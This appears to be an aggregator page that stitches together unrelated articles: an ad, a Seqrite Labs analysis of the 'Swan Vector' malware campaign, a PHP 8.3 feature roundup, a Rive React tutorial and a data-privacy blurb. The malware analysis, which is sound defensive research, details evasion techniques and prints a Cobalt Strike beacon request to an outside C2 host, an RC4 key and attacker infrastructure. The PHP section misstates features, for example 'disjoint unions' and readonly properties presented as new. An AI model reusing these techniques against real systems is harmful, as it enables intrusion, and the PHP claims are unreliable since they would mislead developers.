New
Collective
🎨✨💻 Stay ahead of the curve with handpicked, high-quality frontend development and design news, picked freshly every single day. No fluff, no filler—just the most relevant insights, inspiring reads, and updates to keep you in the know.
Prefer a weekly digest in your inbox? No problem, we got you covered. Just subscribe here.
At Browserling and Online Tools we love sales.
We just created a new automated Monday Sale.
Now on Mondays, we show a 50% discount offer to all users who visit our site.
Browserling is an online service that lets you test how other websites look and work in different web browsers, like Chrome, Firefox, or Safari, without needing to install them. It runs real browsers on real machines and streams them to your screen, kind of like remote desktop but focused on browsers. This helps web developers and regular users check for bugs, suspicious links, and weird stuff that happens in certain browsers. You just go to Browserling, pick a browser and version, and then enter the site you want to test. It’s quick, easy, and works from your browser with no downloads or installs.
Online Tools is a website that offers free, browser-based productivity tools for everyday tasks like editing text, converting files, editing images, working with code, and way more. It’s an all-in-one Digital Swiss Army Knife with 1500+ utilities, so you can find the exact tool you need without installing anything. Just open the site, use what you need, and get things done fast.
Browserling and Online Tools are used by millions of regular internet users, developers, designers, students, and even Fortune 100 companies. Browserling is handy for testing websites in different browsers without having to install them. Online Tools are used for simple tasks like resizing or converting images, or even fixing small file problems quickly without downloading any apps.
Buy a subscription now and see you next time!
Seqrite Labs APT-Team has recently uncovered a campaign which we have termed as Swan Vector, that has been targeting the nations across the East China sea such as Taiwan and Japan. The campaign is aimed at educational institutes and mechanical engineering industry with lures aiming to deliver fake resume of candidates which acts as a decoy.
The entire malware ecosystem involved in this campaign comprises a total of four stages, the first being one being a malicious LNK, the second stage involves the shortcut file executing DLL implant Pterois via a very well-known LOLBin. It uses stealthy methods to execute and download the third stage containing multiple files including legitimate Windows executable that is further used to execute another implant Isurus via DLL-Sideloading. This further executes the fourth stage that is the malicious Cobalt Strike shellcode downloaded by Pterois.
In this blog, we’ll explore the sophistication and cover every minutia technical detail of the campaign we have encountered during our analysis. We will examine the various stages of this campaign, starting with the analysis of shortcut (.LNK) file to multiple DLL implants ending with analyzing the shellcode with a final overview.
Recently in April, our team found a malicious ZIP file named as 歐買尬金流問題資料_20250413 (6).rar which can be translated to Oh My God Payment Flow Problem Data – 2025/04/13 (6) , which has been used as preliminary source of infection, containing various files such as one of them being an LNK and other a file with .PNG extension.
The ZIP contains a malicious LNK file named, 詳細記載提領延遲問題及相關交易紀錄.pdf.lnk. which translates to, “Shortcut to PDF: Detailed Documentation of Withdrawal Delay Issues and Related Transaction Records.pdf.lnk”, which is responsible for running the DLL payload masqueraded as a PNG file known as Chen_YiChun.png. This DLL is then executed via a very well-known LOLBin that is RunDLL32.exe which further downloads other set of implants and a PDF file, which is a decoy.
As, the first DLL implant aka Pterois was initially executed via the LOLBin, we saw a decoy file named rirekisho2025 which basically, stands for a nearly Japanese translation for Curriculum Vitae (CV 2025) was downloaded and stored inside the Temp directory along-side other implants and binaries. 
In the first page, there is a Japanese resume/employment history form “履歴書・職歴経歴書” dated with the Reiwa era format (令和5年4月). The form has a basic header section with fields for personal information including name (氏名), date, gender selection (男/女), birth date, address fields, email address (E-Mail), and contact numbers. There’s also a photo placeholder box in the upper right corner. The decoy appears to be mostly blank with rows for entering education and work history details. Notable fields include entries for different years (月), degree/qualification levels, and employment dates. At the bottom, there are sections for licenses/certifications and additional notes. 
In the second page, there are two identical sections labeled “職歴 1” and “職歴 2” for employment history entries. Each section contains fields for company name, position, employment dates, and a large notes section. The fields are arranged in a similar layout with spaces for company/organization name (会社・団体名), position title, dates of employment, and work-related details. There’s also a section with red text indicating additional about documents or materials (調査、調査料、ファイル等). 
In the third and last page, there is one more employment history section “職歴 3” with the same structure as the previous page – company name, position, employment dates, and notes. Below this, there are five additional employment history sections with repeated fields for company name, position, and employment dates, though these appear more condensed than the earlier sections. Each section follows the same pattern of requesting employment-related information in a structured format. Next, we will look into the infection chain and technical analysis.
We will break down the technical capabilities of this campaign into four different parts.
The ZIP contains a malicious LNK file, known as 詳細記載提領延遲問題及相關交易紀錄.pdf.lnk which translates to Detailed Record of Withdrawal Delay Issues and Related Transaction Records. Another name is also seen with the same LNK as 針對提領系統與客服流程的改進建議.pdf.lnk that translates to Suggestions for Improving the Withdrawal System and Customer Service Process. Creation time of LNK is 2025-03-04. 
Upon analyzing the contents of this malicious LNK file, we found that its sole purpose is to spawn an instance of the LOLBin rundll32.exe, which is then used to execute a malicious DLL implant named Pterois. The implant’s export function Trpo with an interesting argument 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg, which we will look into the later part of this technical analysis, on how this argument is being leveraged by the implant.
Initially, upon examining the malicious RAR archive, along with the malicious LNK file, we found another file with .PNG extension known as Chen_YiChun.png . 
On doing some initial analysis, we figured out that the file is basically a DLL implant, and we have called it as Pterois. Now, let us examine the technicalities of this implant. 
While we did analyze the malicious LNK file, we did see that rundll32.exe is used to execute this DLL file’s export function Trpo. 
Looking inside the implant’s functionalities, it has two primary features, the first one is to perform API Hashing, and the latter is used to download the next stage of malware. 
The first function is responsible for resolving all APIs from the DLLs like NTDLL, UCRTBase, Kernel32 and other necessary libraries required, and the APIs required for desired functions. 
This is done by initially accessing the Process Environment Block (PEB) to retrieve the list of loaded modules. The code then traverses this list using the InMemoryOrderModuleList, which contains linked LDR_DATA_TABLE_ENTRY structures — each representing a loaded DLL. Within each LDR_DATA_TABLE_ENTRY, the BaseDllName field (a UNICODE_STRING) holds just the DLL’s filename (e.g., ntdll.dll), and the DllBase field contains its base address in memory.
During traversal, the function converts the BaseDllName to an ANSI string, normalizes it by converting to uppercase and computes a case-insensitive SDBM hash of the resulting string. This computed hash is compared against a target hash provided to the function. If a match is found, the corresponding DLL’s base address is obtained from the DllBase field and returned. 
Now, once the DLL’s base address is returned, the code uses a similar case-insensitive SDBM hashing algorithm to resolve API function addresses within NTDLL.DLL. It does this by parsing the DLL’s Export Table, computing the SDBM hash of each exported function name, and comparing it to a target hash to find the matching function address. 
Here is a simple python script, which evaluates and performs hashing. So, in the first function, a total of four functions have been resolved. 
Similarly, the APIs for the other two dynamicalliy linked libraries ucrtbase.dll & Kernel32.dll , are being resolved in the same manner. 
In the next set of functions, where it is trying to resolve the APIs from DLLs like Iphlapi.dll , shell32.dll and WinHTTP.dll, it initially resolves the DLL’s base address just like the previous functions. Once it is returned, then it uses a simple yet pseudo-anti-analysis technique that is using Timer Objects to load these above DLLs. 
Initially it creates a timer-object using RtlCreateTimerQueue, once the Timer Object is created, then another API RtlCreateTimer is used to run a callback function, which is LoadLibraryW API in this case, further used to load the DLL. 
Then, the GetModuleHandleW is used to get a handle to the IPHLAPI.DLL. So, once it succeeds, the RtlDeleteTimerQueue API is used to delete and free the Timer Object. Then, finally an API GetAdaptersInfo is resolved via a hash. 
Similarly, other DLLs are also loaded in the same manner. Next, we will look into the later part of the implant that is the set of functions responsible for downloading the next stager. 
The function starts with initially getting the entire Command Line parameter comprising of the LOLBin and the argument, that later gets truncated to 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg which basically is a hardcoded file-ID. 
Then it uses a technique to abuse Google Drive as a command-and-control server by first establishing authentication with legitimate OAuth credentials. After obtaining a valid access token through a properly formatted OAuth exchange, it uses the Google Drive API to retrieve files from specific hardcoded file IDs, including malicious executables, DLLs, and configuration files which it downloads to predetermined paths in C:\Windows\Temp.
Then it sets the appropriate Content-Type header to “application/x-www-form-urlencoded” to ensure the request is processed correctly by Google’s authentication servers. Following this exchange, it performs precise JSON parsing capabilities, where it extracts the “access_token” field from Google’s response using cJSON_GetObjectItem. Looking into the memory dump clearly displays the obtained OAuth token beginning with “ya29.a0AZYk”, confirming a successful authentication process. Once this token is parsed and extracted then it is carefully stored and subsequently used to authorize API calls to Google Drive, allowing the implant to download additional payloads while appearing as legitimate traffic from Google Drive. The parsed JSON extracted from the memory looks something like this. 
Now, once the files are downloaded, another part of this implant uses CreateThread to spawn these downloaded decoy and other files to execute. 
Finally, these files are downloaded, and the decoy is spawned on the screen and the task of Pterois implant, is done. 
Well, the last part of this implant is, once the entire task is complete, it goes ahead and performs Self-Delete to cover its tracks and reduce the chance of detection.
The self-deletion routine uses a delayed execution technique by spawning a cmd.exe process that pings localhost before deleting the file, ensuring the deletion occurs after the current process has completed and released its file handles.
Next, we will look into the other DLL implant, which has been downloaded by this malicious loader.
The previous implant downloads a total of four samples. Out of which one of them is a legitimate Windows Signed binary known as PrintDialog.exe. 
Now, the other file PrintDialog.dll which is the other implant with compilation timestamp 2025-04-08 03:02:59 UTC, is responsible for running the shellcode contents present inside the ra.ini file, abuses a very well-known technique known as DLL-Sideloading by placing the malicious DLL in the current directory as PrintDialog.exe does not explicitly mention the path and this Implant which we call as Isurus performs malicious tasks. 
Looking, onto the export table, we can see that the malicious implant exports only two functions, one of them being the normal DllEntryPoint and the other being the malicious DllGetActivationFactory export function. 
Looking inside the export function, we can see that this Isurus performs API resolution via hash along with shellcode extraction and loads and executes the shellcode in memory. 
The implant initially resolves the APIs by performing the PEB-walking technique, traversing the Process Environment Block (PEB) to locate the base address of needed DLLs such as ntdll.dll and kernel32.dll. Once the base address of a target DLL is identified, the implant proceeds to manually parse the PE (Portable Executable) headers of the DLL to locate the Export Directory Table. 
Now, to resolve specific APIs, the implant employs a hashing algorithm – CRC32. Instead of looking up an export by name, the loader computes a hash of each function name in the export table and compares it to precomputed constants embedded in the code to finally resolve the hashes. 
Now, let us look into how this implant extracts and loads the shellcode. 
It initially opens the existing file ra.ini with read permissions using CreateFileW API, then once it gets the handle, another API known as GetFileSize is used to read the size of the file. Once the file size is obtained, it is processed via ReadFile API. 
Then, using a hardcoded RC4 key wquefbqw the shellcode is then decrypted and returned. 
After extracting the shellcode, it is executed directly in memory using a syscall-based execution technique. This approach involves loading the appropriate syscall numbers into the EAX register and invoking low-level system calls to allocate memory, write the shellcode, change memory protections, and ultimately execute the shellcode—all without relying on higher-level Windows API functions. The PDB path of this implant also depicts the functionality:
In the next part, we will look into the malicious shellcode and its workings.
Upon looking into the file, we figured out that the shellcode is in encrypted format. Next, we decrypted the shellcode using the key, using a simple Python script. 
Further, on analyzing the shellcode, we found, that it is a Cobalt Strike based beacon. Therefore, here are the extracted configs. Extracted beacon config:
Process Injection Targets:
windir\syswow64\bootcfg.exe
windir\sysnative\bootcfg.exe
Infrastructural information:
hxxps://52.199.49.4:7284/jquery-3.3.1.min.js
hxxps://52.199.49.4:7284/jquery-3.3.2.min.js
Request Body :
GET /jquery-3.3.1.min.js HTTP/1.1
Host: 52.199.49.4:7284
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=dT98nN_EYDF96RONtS1uMjE0IZIWy9GljNoWh6rXhEndZDFhNo_Ha4AmFQKcUn9C4ZUUqLTAI6-6HUu3jA-WcnuttiUnceIu3FbAlBPitw52PirDxM_nP460iXUlVqW6Lvv__Wr3k09xnyWZN4besu1gVlk3JWS2hX_yt5EioqY
Connection: Keep-Alive
Cache-Control: no-cache
HTTP Settings GET Hash:
52407f3c97939e9c8735462df5f7457d
HTTP Settings POST Hash:
7c48240b065248a8e23eb02a44bc910a
Due to the extensive documentation and prevalence of Cobalt Strike in offensive security operations, an in-depth analysis is deemed unnecessary. Nonetheless, available extracted beacon configuration, confirm that the threat actor leveraged Cobalt Strike as a component of their intrusion toolkit in this campaign.
As, we did encounter while reverse-engineering the implants, we found that the threat actor had been using Google-Drive as a command-and-control (C2) framework, which also leaked a lot of details such as sensitive API-keys and much more. We have found the associated details related to the threat actor’s infrastructure such as associated Gmail Address & list of implants, which had been scheduled by the threat actor for other campaigns, which have not been used In-The-Wild (ITW). Information related to Threat Actor’s Google Drive Account: { “user”: { “kind”: “drive#user”, “displayName”: “Swsanavector56”, “photoLink”: “https://lh3.googleusercontent.com/a/ACg8ocKiv7cWvdPxivqyPdYB70M1QTLrTsWUb-QHii8yNv60kYx8eA=s64”, “me”: true, “permissionId”: “09484302754176848006”, “emailAddress”: “swsanavector42@gmail.com” }} List of files found inside the Google Drive
| File Name | File ID | Type | Size | SHA-256 Hash |
| PrintDialog.exe | 14gFG2NsJ60CEDsRxE5aXvFN0Fs83YMMG | EXE | 123,032 bytes | 7a942f65e8876aeec0a1372fcd4d53aa1f84d2279904b2b86c49d765e5a29d6f |
| PrintDialog.dll | 1VMrUQlxvKZZ-fRyQ8m3Ai8ZEhkzE3g5T | DLL | 108,032 bytes | a9b33572237b100edf1d4c7b0a2071d68406e5931ab3957a962fcce4bfc2cc49 |
| ra.ini | 1JAXiUPz6kvzOlokDMDxDhA4ohidt094b | INI | 265,734 bytes | 0f303988e5905dffc3202ad371c3d1a49bd3ea5e22da697031751a80e21a13a7 |
| rirekisho2025.pdf | 17hO28MbwD2assMsmA47UJnNbKB2fpM_A | 796,062 bytes | 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd | |
| rirekisho2021_01.pdf | 1LwalLoUdSinfGqYUx8vBCJ3Kqq_LCxIg | 796,062 bytes | 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd | |
| wbemcomn.dll | 1aY5oX6EIe4hfGD6QgAAzmCcwxM4DoLke | DLL | 181,760 bytes | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 |
| svhost.exe | 1P8_PG2DGtLWA3q8F4XPy43GMLznZFtQv | EXE | 209,920 bytes | e0c6f9abfc11911747a7533f3282e7ff0c10fc397129228621bcb3a51f5be980 |
| 0g9pglZr74.ini | 1UE7gNfUIuTRzgjIv188hRIZG3YNtbvkV | INI | 265,734 bytes | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d |
| KpEvjK3KG2.enc | 1RxJi1RZMhcF31F1lgQ9TJfXMuvSJkYQl | ENC | 265,734 bytes | e86feaa258df14e3023c7a74b7733f0b568cc75092248bec77de723dba52dd12 |
| LoggingPlatform.dll | 1lZgq1ZNkK88eJsl6GlcvpzRuFlBgxEOF | DLL | 112,640 bytes | 9df9bb3c13e4d20a83b0ac453e6a2908b77fc2bf841761b798b903efb2d0f4f7 |
| 0g9pglZr74.ini | 1ky1fEzC6v70U8-RbHBZG_i3YI79Ir8Og | INI | 265,734 bytes | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d |
| python310.dll | 1RuMLCJJ5hcFiVXbcg8kZK3giueWiVbTJ | DLL | 189,952 bytes | e1b2d0396914f84d27ef780dd6fdd8bae653d721eea523f0ade8f45ac9a10faf |
| ra.ini | 13ooFQAYZ27Bx015UQG3qkHR293wlcL90 | INI | 265,734 bytes | 777961d51eb92466ca4243fa32143520d49077a3f7c77a2fcbec183ebf975182 |
| pythonw.exe | 19n1ta4hyQguQQmR8C6SAsZuGNQF4-ddU | EXE | 97,000 bytes | 040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92 |
| python.xml | 1k4Q18FByEXW98Rr1CXyVVC-Kj8T0NBDW | XML | 1,526 bytes | c8ed52278ec00a6fbc9697661db5ffbcbe19c5ab331b182f7fd0f9f7249b5896 |
| OneDriveFileLauncher.exe | 137tczdqf5R7RMRoOb9fI_YjZuncd_TUn | EXE | 392,760 bytes | 7bf5e1f3e29beccca7f25d7660545161598befff88506d6e3648b7b438181a75 |
| wbemcomn.dll | 1xUPkhfaWIgYs5HSmxYPC_sZT4QKm_T7i | DLL | 181,760 bytes | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 |
| 0g9pglZr74.ini | 1Ylpf9XVnztxeGk-joNw9df3b0Mv8wYU3 | INI | 265,734 bytes | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d |
| svhost.exe | 1wo1gZ9acixvy925lM6QAkz6Uaj6cRXxx | EXE | 209,920 bytes | e0c6f9abfc11911747a7533f3282e7ff0c10fc397129228621bcb3a51f5be980 |
| llv | 1ZuzB7x0zzgz34eNhHp_TI3auPhHj8Xhc | Folder | – | – |
We also observed this host-address was being used where the Cobalt-Strike was being hosted under ASN 16509 with location of IP being in Japan. 
Also, apart from the Google Drive C2, we have also found that the Gmail address has been used to create accounts and perform activities which have currently been removed under multiple platforms like Google Maps, YouTube and Apple based services.
Attribution.While attribution remains a key perspective when analyzing current and future motives of threat actors, we have observed similar modus operandi to this campaign, particularly in terms of DLL sideloading techniques. Previously, the Winnti APT group has exploited PrintDialog.exe using this method. Additionally, when examining the second implant, Isurus, we found some similarities with the codebase used by the Lazarus group, which has employed DLL sideloading techniques against wmiapsrv.exe – a file that was found uploaded to the threat actor’s Google Drive account. Along with which we have found a few similarities between Swan Vector and APT10’s recent targets across Japan & Taiwan.
While these observations alone do not provide concrete attribution, when combined with linguistic analysis, implant maturity, and other collected artifacts, we are attributing this threat actor to the East Asian geosphere with medium confidence.
Upon analysis and research, we have found that the threat actor is based out of East Asia and have been active since December 2024 targeting multiple hiring-based entities across Taiwan & Japan. The threat actor relies on custom development of implants comprising of downloader, shellcode-loaders & Cobalt Strike as their key tools with heavily relying on multiple evasion techniques like API hashing, Direct-syscalls, function callback, DLL Sideloading and self-deletion to avoid leaving any sort of traces on the target machine.
We believe that the threat actor will be using the above implants which have been scheduled for upcoming campaigns which will be using DLL sideloading against applications like Python, WMI Performance Adapter Service, One Drive Launcher executable to execute their malicious Cobalt Strike beacon with CV-based decoys.
Decoys (PDFs)
| Filename | SHA-256 |
| rirekisho2021_01.pdf | 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd |
| rirekisho2025.pdf | 8710683d2ec2d04449b821a85b6ccd6b5cb874414fd4684702f88972a9d4cfdd |
IP/Domains
Malicious Implants
| Filename | SHA-256 |
| wbemcomn.dll | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 |
| LoggingPlatform.dll | 9df9bb3c13e4d20a83b0ac453e6a2908b77fc2bf841761b798b903efb2d0f4f7 |
| PrintDialog.dll | a9b33572237b100edf1d4c7b0a2071d68406e5931ab3957a962fcce4bfc2cc49 |
| python310.dll | e1b2d0396914f84d27ef780dd6fdd8bae653d721eea523f0ade8f45ac9a10faf |
| Chen_YiChun.png | de839d6c361c7527eeaa4979b301ac408352b5b7edeb354536bd50225f19cfa5 |
| 針對提領系統與客服流程的改進建議.pdf.lnk | 9c83faae850406df7dc991f335c049b0b6a64e12af4bf61d5fb7281ba889ca82 |
Shellcode and other suspicious binaries
| Filename | SHA-256 |
| 0g9pglZr74.ini | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d |
| ra.ini | 0f303988e5905dffc3202ad371c3d1a49bd3ea5e22da697031751a80e21a13a7 |
| python.xml | c8ed52278ec00a6fbc9697661db5ffbcbe19c5ab331b182f7fd0f9f7249b5896 |
| KpEvjK3KG2.enc | e86feaa258df14e3023c7a74b7733f0b568cc75092248bec77de723dba52dd12 |
| Tactic | Technique ID | Technique Name | Sub-technique ID | Sub-technique Name |
| Initial Access | T1566 | Phishing | T1566.001 | Spearphishing Attachment |
| Execution | T1129 | Shared Modules | ||
| Execution | T1106 | Native API | ||
| Execution | T1204 | User Execution | T1204.002 | Malicious File |
| Persistence | T1574 | Hijack Execution Flow | T1574.001 | DLL Sideloading |
| Privilege Escalation | T1055 | Process Injection | T1055.003 | Thread Execution Hijacking |
| Privilege Escalation | T1055 | Process Injection | T1055.004 | Asynchronous Procedure Call |
| Defense Evasion | T1218 | System Binary Proxy Execution | T1218.011 | Rundll32 |
| Defense Evasion | T1027 | Obfuscated Files or Information | T1027.007 | Dynamic API Resolution |
| Defense Evasion | T1027 | Obfuscated Files or Information | T1027.012 | LNK Icon Smuggling |
| Defense Evasion | T1027 | Obfuscated Files or Information | T1027.013 | Encrypted/Encoded File |
| Defense Evasion | T1070 | Indicator Removal | T1070.004 | File Deletion |
| Command and Control | T1102 | Web Service |
PHP 8.3 introduces several new features and improvements to enhance performance and the developer experience. Dive into the latest PHP 8.3 release and discover the new features set to revolutionize how developers build applications. From read-only properties to disjoint unions, learn how these enhancements can help you write more efficient and maintainable code while boosting overall performance.
Here are some of the most significant updates:
class User {
public readonly string $name;
public function __construct(string $name) {
$this->name = $name;
}
}
$user = new User("Alice");
// $user->name = "Bob"; // This will throw an error
function process(mixed $input): int|string {
if (is_int($input)) {
return $input * 2;
}
if (is_string($input)) {
return strtoupper($input);
}
throw new InvalidArgumentException();
}
$jsonString = '{"name": "Alice", "age": 25}';
if (json_validate($jsonString)) {
echo "Valid JSON!";
} else {
echo "Invalid JSON!";
}
class Config {
public const int MAX_USERS = 100;
}
$engine = new Random\Engine\Mt19937(); $random = new Random\Randomizer($engine); echo $random->getInt(1, 100); // Random number between 1 and 100
PHP 8.3 brings a mix of new features, performance improvements, and developer experience enhancements. These changes help developers write more robust, efficient, and maintainable code, while also taking advantage of performance optimizations under the hood. The introduction of readonly properties, disjoint unions, and typed class constants, along with improvements in JIT and error reporting, are particularly impactful in making PHP a more powerful and developer-friendly language.
Bringing new tools into a workflow is always exciting—curiosity bumps up against the comfort of familiar methods. But when our longtime client, Chumbi Valley, came to us with their Valley Adventures project, we saw the perfect opportunity to experiment with Rive and craft cartoon-style animations that matched the playful spirit of the brand.
Rive is a powerful real-time interactive design tool with built-in support for interactivity through State Machines. In this guide, we’ll walk you through how we integrated a .riv file into a React environment and added mouse-responsive animations.
We’ll also walk through a modernized integration method using Rive’s newer Data Binding feature—our current preferred approach for achieving the same animation with less complexity and greater flexibility.
Valley Adventures is a gamified Chumbi NFT staking program, where magical creatures called Chumbi inhabit an enchanted world. The visual direction leans heavily into fairytale book illustrations—vibrant colors, playful characters, and a whimsical, cartoon-like aesthetic.
To immediately immerse users in this world, we went with a full-section hero animation on the landing page. We split the animation into two parts:
Several elements animate simultaneously—background layers like rustling leaves and flickering fireflies, along with foreground characters that react to movement. The result is a dynamic, storybook-like experience that invites users to explore.
The most interesting—and trickiest—part of the integration was tying animations to mouse tracking. Rive provides a built-in way to handle this: by applying constraints with varying strengths to elements within a group that’s linked to Mouse Tracking, which itself responds to the cursor’s position.
However, we encountered a limitation with this approach: the HTML buttons layered above the Rive asset were blocking the hover state, preventing it from triggering the animation beneath.
To work around this, we used a more robust method that gave us finer control and avoided those problems altogether.
Here’s how we approached it:
By adjusting the values of these inputs based on the cursor’s position, you can control how tightly the animation responds on each axis. This approach gives you a smoother, more customizable parallax effect—and prevents unexpected behavior caused by overlapping UI.
Once the animation is ready, simply export it as a .riv file—and leave the rest of the magic to the devs.
Before we dive further, let’s clarify what a .riv file actually is.
A .riv file is the export format from the Rive editor. It can include:
In our case, we’re using a State Machine with two numeric inputs: Axis_X and Axis_Y. These inputs are tied to how we control animation in Rive, using values from the X and Y axes of the cursor’s position.
These inputs drive the movement of different elements—like the swaying leaves, fluttering fireflies, and even subtle character reactions—creating a smooth, interactive experience that responds to the user’s mouse.
Install the official package:
npm install @rive-app/react-canvasCreate a component called RiveBackground.tsx to handle loading and rendering the animation.
const { rive, setCanvasRef, setContainerRef } = useRive({
src: 'https://cdn.rive.app/animations/hero.riv',
autoplay: true,
layout: new Layout({ fit: Fit.Cover, alignment: Alignment.Center }),
onLoad: () => setIsLoaded(true),
enableRiveAssetCDN: true,
});
For a better understanding, let’s take a closer look at each prop you’ll typically use when working with Rive in React:
What each option does:
| Property | Description |
| src | Path to your .riv file — can be local or hosted via CDN |
| autoplay | Automatically starts the animation once it’s loaded |
| layout | Controls how the animation fits into the canvas (we’re using Cover and Center) |
| onLoad | Callback that fires when the animation is ready — useful for setting isLoaded |
| enableRiveAssetCDN | Allows loading of external assets (like fonts or textures) from Rive’s CDN |
const numX = useStateMachineInput(rive, 'State Machine 1', 'Axis_X', 0);
const numY = useStateMachineInput(rive, 'State Machine 1', 'Axis_Y', 0);This setup connects directly to the input values defined inside the State Machine, allowing us to update them dynamically in response to user interaction.
☝️ Important: Make sure your .riv file includes the exact names: Axis_X, Axis_Y, and State Machine 1. These must match what’s defined in the Rive editor — otherwise, the animation won’t respond as expected.
useEffect(() => {
if (!numX || !numY) return;
const handleMouseMove = (e: MouseEvent) => {
const { innerWidth, innerHeight } = window;
numX.value = (e.clientX / innerWidth) * 100;
numY.value = 100 - (e.clientY / innerHeight) * 100;
};
window.addEventListener('mousemove', handleMouseMove);
return () => window.removeEventListener('mousemove', handleMouseMove);
}, [numX, numY]);What’s happening here:
clientX and clientY to track the mouse position within the browser window.⚠️ Important: Always remember to remove the event listener when the component unmounts to avoid memory leaks and unwanted behavior.
useEffect(() => {
return () => rive?.cleanup();
}, [rive]);And the render:
return (
<div
ref={setContainerRef}
className={`rive-container ${className ?? ''} ${isLoaded ? 'show' : 'hide'}`}
>
<canvas ref={setCanvasRef} />
</div>
);cleanup() — frees up resources when the component unmounts. Always call this to prevent memory leaks.setCanvasRef and setContainerRef — these must be connected to the correct DOM elements in order for Rive to render the animation properly.And here’s the complete code:
import {
useRive,
useStateMachineInput,
Layout,
Fit,
Alignment,
} from '@rive-app/react-canvas';
import { useEffect, useState } from 'react';
export function RiveBackground({ className }: { className?: string }) {
const [isLoaded, setIsLoaded] = useState(false);
const { rive, setCanvasRef, setContainerRef } = useRive({
src: 'https://cdn.rive.app/animations/hero.riv',
animations: ['State Machine 1','Timeline 1','Timeline 2'
],
autoplay: true,
layout: new Layout({ fit: Fit.Cover, alignment: Alignment.Center }),
onLoad: () => setIsLoaded(true),
enableRiveAssetCDN: true,
});
const numX = useStateMachineInput(rive, 'State Machine 1', 'Axis_X', 0);
const numY = useStateMachineInput(rive, 'State Machine 1', 'Axis_Y', 0);
useEffect(() => {
if (!numX || !numY) return;
const handleMouseMove = (e: MouseEvent) => {
if (!numX || !numY) {
return;
}
const { innerWidth, innerHeight } = window;
numX.value = (e.clientX / innerWidth) * 100;
numY.value = 100 - (e.clientY / innerHeight) * 100;
};
window.addEventListener('mousemove', handleMouseMove);
return () => window.removeEventListener('mousemove', handleMouseMove);
}, [numX, numY]);
useEffect(() => {
return () => {
rive?.cleanup();
};
}, [rive]);
return (
<div
ref={setContainerRef}
className={`rive-container ${className ?? ''} ${isLoaded ? 'show' : 'hide'}`}
>
<canvas ref={setCanvasRef} />
</div>
);
}
Now you can use the RiveBackground like any other component:
<RiveBackground className="hero-background" />To avoid loading the .wasm file at runtime—which can delay the initial render—you can preload it in App.tsx:
import riveWASMResource from '@rive-app/canvas/rive.wasm';
<link
rel="preload"
href={riveWASMResource}
as="fetch"
crossOrigin="anonymous"
/>This is especially useful if you’re optimizing for first paint or overall performance.
In the first part of this article, we used a classic approach with a State Machine to create the parallax animation in Rive. We built four separate animations (top, bottom, left, right), controlled them using input variables, and blended their states to create smooth motion. This method made sense at the time, especially before Data Binding support was introduced.
But now that Data Binding is available in Rive, achieving the same effect is much simpler—just a few steps. Data binding in Rive is a system that connects editor elements to dynamic data and code via view models, enabling reactive, runtime-driven updates and interactions between design and development.
In this section, we’ll show how to refactor the original Rive file and code using the new approach.
Now the group will move dynamically based on values passed from JavaScript.
Before we dive into the updated JavaScript, let’s quickly define an important concept:
When using Data Binding in Rive, viewModelInstance refers to the runtime object that links your Rive file’s bindable properties (like pointerX or pointerY) to your app’s logic. In the Rive editor, you assign these properties to elements like positions, scales, or rotations. At runtime, your code accesses and updates them through the viewModelInstance—allowing for real-time, declarative control without needing a State Machine.
With that in mind, here’s how the new setup replaces the old input-driven logic:
import { useRive } from '@rive-app/react-canvas';
import { useEffect, useState } from 'react';
export function ParallaxEffect({ className }: { className?: string }) {
const [isLoaded, setIsLoaded] = useState(false);
const { rive, setCanvasRef, setContainerRef } = useRive({
src: 'https://cdn.rive.app/animations/hero.riv',
autoplay: true,
autoBind: true,
onLoad: () => setIsLoaded(true),
});
useEffect(() => {
if (!rive) return;
const vmi = rive.viewModelInstance;
const pointerX = vmi?.number('pointerX');
const pointerY = vmi?.number('pointerY');
if (!pointerX || !pointerY) return;
const handleMouseMove = (e: MouseEvent) => {
const { innerWidth, innerHeight } = window;
const x = (e.clientX / innerWidth) * 100;
const y = 100 - (e.clientY / innerHeight) * 100;
pointerX.value = x;
pointerY.value = y;
};
window.addEventListener('mousemove', handleMouseMove);
return () => {
window.removeEventListener('mousemove', handleMouseMove);
rive.cleanup();
};
}, [rive]);
return (
<div
ref={setContainerRef}
className={`rive-container ${className ?? ''} ${isLoaded ? 'show' : 'hide'}`}
>
<canvas ref={setCanvasRef} />
</div>
);
}You get the same parallax effect, but:
👉 CodeSandbox: Data Binding Parallax
Data Binding is a major step forward for interactive Rive animations. Effects like parallax can now be set up faster, more reliably, and with cleaner logic. We strongly recommend this approach for new projects.
So why did we choose Rive over Lottie for this project?
Our biggest takeaway? Don’t be afraid to experiment with new tools—especially when they feel like the right fit for your project’s concept. Rive matched the playful, interactive vibe of Valley Adventures perfectly, and we’re excited to keep exploring what it can do.
In today’s high-stakes digital arena, data is the lifeblood of every enterprise. From driving strategy to unlocking customer insights, enterprises depend on data like never before. But with significant volume comes great vulnerability.
Imagine managing a massive warehouse without labels, shelves, or a map. That’s how most organizations handle their data today—scattered across endpoints, servers, SaaS apps, and cloud platforms, much of it unidentified and unsecured. This dark, unclassified data is inefficient and dangerous.
At Seqrite, the path to resilient data privacy and governance begins with two foundational steps: Data Discovery and Classification.
Before protecting your data, you need to know what you have and where it resides. That’s the core of data discovery—scanning your digital landscape to locate and identify every piece of information, from structured records in databases to unstructured files in cloud folders.
Modern Privacy tools leverage AI and pattern recognition to unearth sensitive data, whether it’s PII, financial records, or health information, often hidden in unexpected places. Shockingly, nearly 75% of enterprise data remains unused, mainly because it goes undiscovered.
Without this visibility, every security policy and compliance program stands on shaky ground.
